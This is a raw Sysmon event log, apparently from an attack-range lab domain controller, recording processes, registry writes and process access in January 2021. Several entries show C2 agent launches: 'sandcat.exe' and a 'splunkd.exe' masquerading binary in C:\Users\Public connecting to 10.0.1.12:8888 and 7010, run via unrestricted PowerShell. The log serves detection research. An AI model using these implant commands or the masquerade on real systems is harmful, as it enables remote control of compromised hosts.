13:34:05.799{59A5CD1D-8E47-6005-1900-00000000A301}21362792C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{59A5CD1D-8E4D-6005-2500-00000000A301}2988C:\Users\Public\sandcat.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+8470331b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+83ba41a5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+83ba3e76(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+846554db(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+83b64a0c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+83bc2edb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+83ba6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+83ba6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\Sy
stem.Management.Automation.ni.dll+83ba63d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+83b98356(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+83ba4889(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+83ba4425(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+83ba41a5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+83ba3e76(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+846554db(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+83b8acd7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+83b8a2a7(wow64) 154100x80000000000000001146Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:05.750{59A5CD1D-8E4D-6005-2500-00000000A301}2988C:\Users\Public\sandcat.exe-----"C:\Users\Public\sandcat.exe" -server http://10.0.1.12:8888 -group my_group -vC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=4AAC4143487A1888FC416C8D6AAA28BF,SHA256=A98ED4833C64FF96AD74F1A76358B1FB947C7BC61502E51624AFE6944982EC93,IMPHASH=1CD364A9E949D5ECEBD6C614E64BC545{59A5CD1D-8E47-6005-1900-00000000A301}2136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Unrestricted -NonInteractive -File 
C:\caldera_agent.ps1 13241300x80000000000000001145Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:05.642{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\RegisteredSinceBootDWORD (0x00000000) 13241300x80000000000000001144Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:05.642{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\StaleAdapterDWORD (0x00000000) 13241300x80000000000000001143Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:05.642{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\CompartmentIdDWORD (0x00000001) 13241300x80000000000000001142Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:05.642{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\FlagsDWORD (0x00000000) 13241300x80000000000000001141Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:05.642{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\TtlDWORD (0x000004b0) 13241300x80000000000000001140Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
13:34:05.642{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\SentPriUpdateToIpBinary Data 13241300x80000000000000001139Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:05.642{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\SentUpdateToIpBinary Data 13241300x80000000000000001138Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:05.642{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\DnsServersBinary Data 13241300x80000000000000001137Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:05.642{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\HostAddrsBinary Data 13241300x80000000000000001136Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:05.642{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\PrimaryDomainNameattackrange.local 13241300x80000000000000001135Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:05.642{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\AdapterDomainName(Empty) 
13241300x80000000000000001134Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:05.642{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\Hostnamewin-dc-495 10341000x80000000000000001133Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:02.971{59A5CD1D-8E4A-6005-2400-00000000A301}29242944C:\Windows\system32\conhost.exe{59A5CD1D-8E4A-6005-2300-00000000A301}2916C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001132Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:02.955{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E4A-6005-2400-00000000A301}2924C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001131Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:02.955{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E4A-6005-2300-00000000A301}2916C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001130Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:02.955{59A5CD1D-8E46-6005-1800-00000000A301}20842796Shell.Commands.ManagWindowsPowerShell\v1.0\powershell.exe{59A5CD1D-8E4A-6005-2300-00000000A301}2916C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\shell32.dll+8d42f|C:\Windows\System32\shell32.dll+8d2bc|C:\Windows\System32\shell32.dll+8d00c|C:\Windows\System32\shell32.dll+114fd7|C:\Windows\System32\shell32.dll+114f35|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+33903a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+276811|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+acd828|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+271e5f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b56bc|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\f170745c571d606b4c8c92644c7c13d7\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\f170745c571d606b4c8c92644c7c13d7\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64) 154100x80000000000000001129Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:02.911{59A5CD1D-8E4A-6005-2300-00000000A301}2916C:\Users\Public\splunkd.exe-----"C:\Users\Public\splunkd.exe" 
-socket 10.0.1.12:7010 -http http://10.0.1.12:8888 -contact tcp C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=32E2535A13E90442893737530C4773D1,SHA256=C4A32E14644C0859C895A66C96AECC9647949F8295EADE40ACE7F3EFC597C6F9,IMPHASH=1CD364A9E949D5ECEBD6C614E64BC545{59A5CD1D-8E46-6005-1800-00000000A301}2084C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Unrestricted -NonInteractive -File C:\caldera_manx_agent.ps1 13241300x80000000000000001128Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:02.768{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch2\EpochDWORD (0x00000379) 11241100x80000000000000001127Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localEXE2021-01-18 13:34:02.752{59A5CD1D-8E46-6005-1800-00000000A301}2084C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Public\splunkd.exe2021-01-18 13:32:53.415 10341000x80000000000000001126Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:02.705{59A5CD1D-8E46-6005-1800-00000000A301}20842796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{59A5CD1D-8E4A-6005-2200-00000000A301}2816C:\Windows\system32\wbem\wmiprvse.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b335c|UNKNOWN(00007FF828DC3F41) 10341000x80000000000000001125Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:02.705{59A5CD1D-8E46-6005-1800-00000000A301}20842796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{59A5CD1D-8E44-6005-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b335c|UNKNOWN(00007FF828DC3F41) 10341000x80000000000000001124Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:02.705{59A5CD1D-8E46-6005-1800-00000000A301}20842796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{59A5CD1D-8E47-6005-2000-00000000A301}2344C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b335c|UNKNOWN(00007FF828DC3F41) 10341000x80000000000000001123Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:02.705{59A5CD1D-8E46-6005-1800-00000000A301}20842796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{59A5CD1D-8E46-6005-1700-00000000A301}1632C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b335c|UNKNOWN(00007FF828DC3F41) 10341000x80000000000000001122Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:02.705{59A5CD1D-8E46-6005-1800-00000000A301}20842796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b335c|UNKNOWN(00007FF828DC3F41) 10341000x80000000000000001121Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:02.705{59A5CD1D-8E46-6005-1800-00000000A301}20842796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b335c|UNKNOWN(00007FF828DC3F41) 10341000x80000000000000001120Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:02.705{59A5CD1D-8E46-6005-1800-00000000A301}20842796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b335c|UNKNOWN(00007FF828DC3F41) 10341000x80000000000000001119Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:02.705{59A5CD1D-8E46-6005-1800-00000000A301}20842796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b335c|UNKNOWN(00007FF828DC3F41) 10341000x80000000000000001118Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:02.705{59A5CD1D-8E46-6005-1800-00000000A301}20842796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b335c|UNKNOWN(00007FF828DC3F41) 10341000x80000000000000001117Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:02.705{59A5CD1D-8E46-6005-1800-00000000A301}20842796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b335c|UNKNOWN(00007FF828DC3F41) 10341000x80000000000000001116Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:02.705{59A5CD1D-8E46-6005-1800-00000000A301}20842796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{59A5CD1D-8E46-6005-0F00-00000000A301}1116C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b335c|UNKNOWN(00007FF828DC3F41) 10341000x80000000000000001115Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:02.705{59A5CD1D-8E46-6005-1800-00000000A301}20842796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{59A5CD1D-8E46-6005-0D00-00000000A301}628C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b335c|UNKNOWN(00007FF828DC3F41) 10341000x80000000000000001114Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:02.705{59A5CD1D-8E46-6005-1800-00000000A301}20842796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{59A5CD1D-8E46-6005-0C00-00000000A301}596C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b335c|UNKNOWN(00007FF828DC3F41) 10341000x80000000000000001113Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:02.705{59A5CD1D-8E46-6005-1800-00000000A301}20842796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{59A5CD1D-8E47-6005-1B00-00000000A301}2156C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b335c|UNKNOWN(